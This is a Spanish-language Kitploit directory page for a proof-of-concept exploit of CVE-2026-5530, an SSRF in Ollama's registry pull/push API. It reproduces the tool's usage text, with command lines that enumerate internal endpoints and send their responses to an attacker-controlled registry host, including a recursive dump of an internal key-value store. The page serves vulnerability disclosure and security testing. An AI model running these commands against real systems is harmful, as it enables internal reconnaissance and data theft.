Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5530 — Prueba de concepto de exploit para CVE-2026-5530, un SSRF en la API Pull/Push de Ollama, que permite la enumeración de endpoints internos y la exfiltración completa de respuestas mediante un registro OCI malicioso. | Kitploit
Herramientas/GitHubGitHub/davidrxchester/cve-2026-5530
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de Información
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Prueba de concepto de exploit para CVE-2026-5530, un SSRF en la API Pull/Push de Ollama, que permite la enumeración de endpoints internos y la exfiltración completa de respuestas mediante un registro OCI malicioso.

Ver Repositorio
26hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-5530

SSRF en Ollama mediante redirección de registro OCI con exfiltración completa de la respuesta.

Informe: https://davidrochester.com/posts/cve-2026-5530

Divulgación

Se contactó con Ollama en múltiples ocasiones sin obtener respuesta.

Uso

Tres modos: enum, exfil y probe.

Enum

Encuentra endpoints internos activos accesibles desde el host de Ollama.

python3 poc.py targets.txt --registry-host <your-ip>

Exfil

Exfiltra las respuestas SSRF cuando conoces el tamaño de la respuesta.

python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

Busca el tamaño de la respuesta mediante búsqueda binaria automáticamente y luego exfiltra.

python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

Opciones

target              URL o archivo de URLs (una por línea, # para comentarios)
-p, --port          puerto del registro malicioso (por defecto: 9999)
--exfil-port        puerto del registro de exfiltración (por defecto: 10000)
--exfil             modo de exfiltración, requiere --size
--probe             búsqueda binaria del tamaño, luego exfiltra
--size              Content-Length (requerido con --exfil)
--registry-host     tu IP/hostname de atacante al que Ollama pueda acceder
--ollama            URL de la API de Ollama (por defecto: http://127.0.0.1:11434)
Descargar herramienta